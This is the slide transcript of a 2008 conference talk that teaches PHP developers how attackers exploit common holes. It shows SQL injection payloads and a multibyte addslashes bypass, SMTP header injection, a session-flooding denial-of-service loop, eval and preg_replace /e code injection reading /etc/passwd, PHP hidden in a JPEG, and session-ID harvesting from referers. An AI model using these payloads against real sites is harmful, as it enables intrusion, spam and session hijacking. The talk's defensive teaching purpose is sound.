exploiting php with php
DESCRIPTION
Arpad Ray's PHPNW08 slides:Looking at websites from the perspective of potential attackers is a useful technique not only for security professionals.This talk demonstrates how to use simple PHP scripts to exploit many common security holes in PHP applications, hopefully giving developers a deeper understanding of what it is they are protecting against. * Getting around common precautions against SQL injection * Free spam with SMTP injection * Making a malicious website to exploit PHP sessions * The holes every attacker hopes for * Making use of a newly exploited websiteTRANSCRIPT
Exploiting PHPwith PHP
Exploiting PHP with PHPArpad Ray @ PHPNW08
Exploiting PHPwith PHP
Why use PHP for this?
•We already know how to write PHP
Exploiting PHPwith PHP
Why use PHP for this?
•We already know how to write PHP
•Can use directly in test scripts
Exploiting PHPwith PHP
Why use PHP for this?
•We already know how to write PHP
•Can use directly in test scripts
•PHP provides everything we need
Exploiting PHPwith PHP
Why use PHP for this?
•We already know how to write PHP
•Can use directly in test scripts
•PHP provides everything we need
•Writing PHP can be very quick
Exploiting PHPwith PHP
Why use PHP for this?
•We already know how to write PHP
•Can use directly in test scripts
•PHP provides everything we need
•Writing PHP can be very quick
•Can efficiently re-use and combine attacks
Exploiting PHPwith PHP
SQL injection•Probably the first attack most PHP developers hear of
Exploiting PHPwith PHP
SQL injection
$q = "SELECT * FROM foobar WHERE id = $_GET[id]";
Exploiting PHPwith PHP
SQL injection
$q = "SELECT * FROM foobar WHERE id = $_GET[id]";
index.php?id=1 OR 1=1$_GET['id'] = '1 OR 1=1';
Exploiting PHPwith PHP
SQL injection
$q = "SELECT * FROM foobar WHERE id = $_GET[id]";
index.php?id=1 OR 1=1$_GET['id'] = '1 OR 1=1';
$q = "SELECT * FROM foobar WHERE id = 1 OR 1=1";
Exploiting PHPwith PHP
SQL injection
$q = "SELECT * FROM foobar WHERE id = '$_GET[id]'";
Exploiting PHPwith PHP
SQL injection
$q = "SELECT * FROM foobar WHERE id = '$_GET[id]'";
index.php?id=' OR ''='$_GET['id'] = “' OR ''='”;
Exploiting PHPwith PHP
SQL injection
$q = "SELECT * FROM foobar WHERE id = '$_GET[id]'";
index.php?id=' OR ''='$_GET['id'] = “' OR ''='”;
$q = "SELECT * FROM foobar WHERE id = '' OR ''=''";
Exploiting PHPwith PHP
SQL injection
$q = "SELECT * FROM foobar WHERE id = '$_POST[id]'";
Exploiting PHPwith PHP
SQL injection
$q = "SELECT * FROM foobar WHERE id = $_POST[id]";
<form method=”post” action=”http://example.com/foo.php”>
<input type=”hidden” name=”id” value=”1 OR 1=1” /> <input type=”submit” /></form>
Exploiting PHPwith PHP
SQL injection
$q = "SELECT * FROM foobar WHERE id = $_POST[id]";
$context = stream_context_create(array('http' => array( 'method' => 'post' 'content' => 'id=1 OR 1=1')));file_get_contents('http://example.com/foo.php', false, $context);
Exploiting PHPwith PHP
SQL injection
$q = 'SELECT * FROM foobar WHERE id = ' . addslashes($id);
Exploiting PHPwith PHP
addslashes()
$id = addslashes($_POST['id']);$q = "SELECT * FROM foobar WHERE id = '$id'";
$_POST['id'] = “' OR ''='”;
$q = "SELECT * FROM foobar WHERE id = '\' OR \'\'=\''";
Exploiting PHPwith PHP
addslashes()•Getting around that pesky backslash
Exploiting PHPwith PHP
addslashes()•Getting around that pesky backslash
•Multi-byte character attacks
Exploiting PHPwith PHP
addslashes()•Getting around that pesky backslash
•Multi-byte character attacks
•Swallow the backslash with a multi-byte character ending with that byte
Exploiting PHPwith PHP
addslashes()•Getting around that pesky backslash
•Multi-byte character attacks
•Swallow the backslash with a multi-byte character ending with that byte
•<start of mb character><single quote>// apply addslashes()<mb character><single quote>
Exploiting PHPwith PHP
addslashes()
$mbCharacter = "\xBF\x5C";$quote = substr($mbCharacter, 0, -1) . '\'';
Exploiting PHPwith PHP
addslashes()
$mbCharacter = "\xBF\x5C";$quote = substr($mbCharacter, 0, -1) . '\'';
$id = "$quote OR $quote$quote = $quote";$context = stream_context_create(array('http' => array( 'method' => 'post' 'content' => http_build_query(array('id' => $id)))));file_get_contents('http://example.com/foo.php', false, $context);
$q = "SELECT * FROM foobar WHERE id = '?' OR '?'='?'";
Exploiting PHPwith PHP
addslashes()
$mbCharacter = "\xBF\x5C";$quote = substr($mbCharacter, 0, -1) . '\'';
$id = "$quote OR 1=1 /*";$context = stream_context_create(array('http' => array( 'method' => 'post' 'content' => http_build_query(array('id' => $id)))));file_get_contents('http://example.com/foo.php', false, $context);
$q = "SELECT * FROM foobar WHERE id = '?' OR 1=1 /*'";
Exploiting PHPwith PHP
magic_quotes_gpc•Uses addslashes() so escaping is not secure
Exploiting PHPwith PHP
magic_quotes_gpc•Uses addslashes() so escaping is not secure
•Fosters complacency
Exploiting PHPwith PHP
magic_quotes_gpc•Uses addslashes() so escaping is not secure
•Fosters complacency
•Applications using magic quotes are much harder to make truly portable
Exploiting PHPwith PHP
magic_quotes_gpc•Uses addslashes() so escaping is not secure
•Fosters complacency
•Applications using magic quotes are much harder to make truly portable
•Inconsistencies between PHP versions
Exploiting PHPwith PHP
magic_quotes_gpc$context = stream_context_create(array('http' => array( 'user_agent' => $foo)));
$context = stream_context_create(array('http' => array( 'method' => 'get' 'header' => 'X-Foo: ' . $foo)));
Exploiting PHPwith PHP
magic_quotes_gpc? scalar'1=foo&array'1[scalar'2]=foo&array'1[array'2][scalar'3]=foo
Exploiting PHPwith PHP
magic_quotes_gpc•Expected result:
Array( [scalar\'1] => foo [array\'1] => Array ( [scalar\'2] => foo [array\'2] => Array ( [scalar\'3] => foo ) ))
Exploiting PHPwith PHP
magic_quotes_gpc•PHP 4.3.3
Array( [scalar'1] => foo [array'1] => Array ( [scalar'2] => foo [array\'2] => Array ( [scalar'3] => foo ) ))
Exploiting PHPwith PHP
magic_quotes_gpc•PHP 4.4.0
Array( [scalar'1] => foo [array'1] => Array ( [scalar\'2] => foo [array\'2] => Array ( [scalar\'3] => foo ) ))
Exploiting PHPwith PHP
magic_quotes_gpc•PHP 5.0.0 (OFF)
Array( [scalar\'1] => foo [array\'1] => Array ( [scalar\'2] => foo [array\'2] => Array ( [scalar\'3] => foo ) ))
Exploiting PHPwith PHP
magic_quotes_gpc•PHP 5.2.2
Array( [scalar\'1] => foo [array\'1] => Array ( [scalar\'2] => foo [array\'2] => Array ( [scalar\'3] => foo ) ))
Exploiting PHPwith PHP
magic_quotes_gpc•There are also problems disabling magic_quotes_gpc
Exploiting PHPwith PHP
magic_quotes_gpc•There are also problems disabling magic_quotes_gpc
function stripslashes_deep($value){ $value = is_array($value) ? array_map('stripslashes_deep', $value) : stripslashes($value); return $value;}
Exploiting PHPwith PHP
magic_quotes_gpc•There are also problems disabling magic_quotes_gpc
•Instead of passing id=1 we can pass:'id' . str_repeat('[]', 1000) . '=1'
•We can trivially force the web server to do a lot of unnecessary work
Exploiting PHPwith PHP
Denial of Service•Failure to release resources
Exploiting PHPwith PHP
Denial of Service•Failure to release resources
•Writing user data to disk
Exploiting PHPwith PHP
Denial of Servicefunction fill_sessions($url, $num = 1000)
{ $context = stream_context_create(array( 'http' => array( 'method' => 'HEAD' ) )); for ($i = $num; $i--;) { file_get_contents($url, false, $context); }}
Exploiting PHPwith PHP
Denial of Service•Failure to release resources
•Writing user data to disk
•Locking customer accounts
Exploiting PHPwith PHP
SMTP injection
Exploiting PHPwith PHP
SMTP injection$to = '[email protected]';
$subject = $_POST['subject'];
$from = $_POST['from'];
mail($to, $subject, 'From: ' . $from);
Exploiting PHPwith PHP
SMTP injection$context =
stream_context_create(array('http' => array(
'method' => 'post'
'content' => http_build_query(array(
'subject' => "foo\r\nCc: [email protected]",
'from' => "[email protected]\r\nCc: [email protected]"
))
)));
Exploiting PHPwith PHP
SMTP injection•Variable mail address
Exploiting PHPwith PHP
SMTP injection•Variable mail address
•Sanitisation
Exploiting PHPwith PHP
SMTP injection•Variable mail address
•Sanitisation
•Validation
Exploiting PHPwith PHP
SMTP injection•Variable mail address
•Sanitisation
•Validation
•/^[^@]+@(?:\w+\.)+\w{2,6}$/
Exploiting PHPwith PHP
Hot vulnerabilities
•Direct eval() injection
Exploiting PHPwith PHP
Hot vulnerabilities
•Direct eval() injection
class Foo { function Foo() { $a = func_get_args(); print_r($a); } }
eval('$foo = new Foo(' . implode(',', $args) . ');');
Exploiting PHPwith PHP
Hot vulnerabilities
•Direct eval() injection
$args[0] = 'readfile(“/etc/passed”)';
Exploiting PHPwith PHP
Hot vulnerabilities
•preg_replace() using /e modifier
$s = '$-42 dollars';
preg_replace('/\$(.*?) dollars/e', 'abs($1)', $s)
$s = '42';
Exploiting PHPwith PHP
Hot vulnerabilities
•preg_replace() using /e modifier
$s = '$1).foobar().abs(1 dollars';
preg_replace('/\$(.*?) dollars/e', 'abs($1)', $s)
$s = '4242';
Exploiting PHPwith PHP
Hot vulnerabilities
•preg_replace() using /e modifier
$s = '$1).readfile(chr(47).chr(101)...abs(1 dollars';
preg_replace('/\$(.*?) dollars/e', 'abs($1)', $s)
$s = '4242';
Exploiting PHPwith PHP
Hot vulnerabilities
•Variable in include() call
$page = $_GET['page'];include $page;
Exploiting PHPwith PHP
Hot vulnerabilities
•Direct eval() injection
•preg_replace() using /e modifier
•Variable in include() call
•Uploading PHP files
Exploiting PHPwith PHP
Hot vulnerabilities
•Uploading PHP files
•Check file extension
•Check uploaded MIME type
•Check file MIME type
•Move outside of web root
Exploiting PHPwith PHP
Hot vulnerabilities$script = <<<EOT<?phpvar_dump('hello world!');EOT;$jpeg = '/path/to/some_valid.jpg';
$fp = fopen($jpeg, 'ab');fwrite($fp, $script);fclose($fp);
Exploiting PHPwith PHP
Hot vulnerabilities
•Direct eval() injection
•preg_replace() using /e modifier
•Variable in include() call
•Uploading PHP files
Exploiting PHPwith PHP
Hot vulnerabilities
•Direct eval() injection
•preg_replace() using /e modifier
•Variable in include() call
•Uploading PHP files
•Shell injection
Exploiting PHPwith PHP
Making an evil website
•HTTP requests can give us lots of interesting information
•PHPSESSID = bingo
Exploiting PHPwith PHP
Making an evil website
if (isset($_SESSION['HTTP_REFERER'])) { if (preg_match(' / PHPSESSID=([^=&]+) /xi', $_SESSION['HTTP_REFERER']));}
Exploiting PHPwith PHP
Making an evil website
if (isset($_SESSION['HTTP_REFERER'])) { if (preg_match(' / PHPSESSID=([^=&]+)
|
(?<==)([a-f\d]{32}|[a-f\d]{40})\b /xi', $_SESSION['HTTP_REFERER']));}
Exploiting PHPwith PHP
Making use of victims
•File scan
Exploiting PHPwith PHP
Making use of victims
•File scan
$dir = new RecursiveIteratorIterator(
new RecursiveDirectoryIterator('/', true)
);
foreach ($dir as $file) {
echo $file->getPathname(), "\n";
}
Exploiting PHPwith PHP
Making use of victims
•File scan
•Subverting existing files
Exploiting PHPwith PHP
Making use of victims
•File scan
•Subverting existing files
•Escalate privileges, take over machine
Exploiting PHPwith PHP
Making use of victims
•File scan
•Subverting existing files
•Escalate privileges, take over machine
•botnet.php
Exploiting PHPwith PHP
Questions?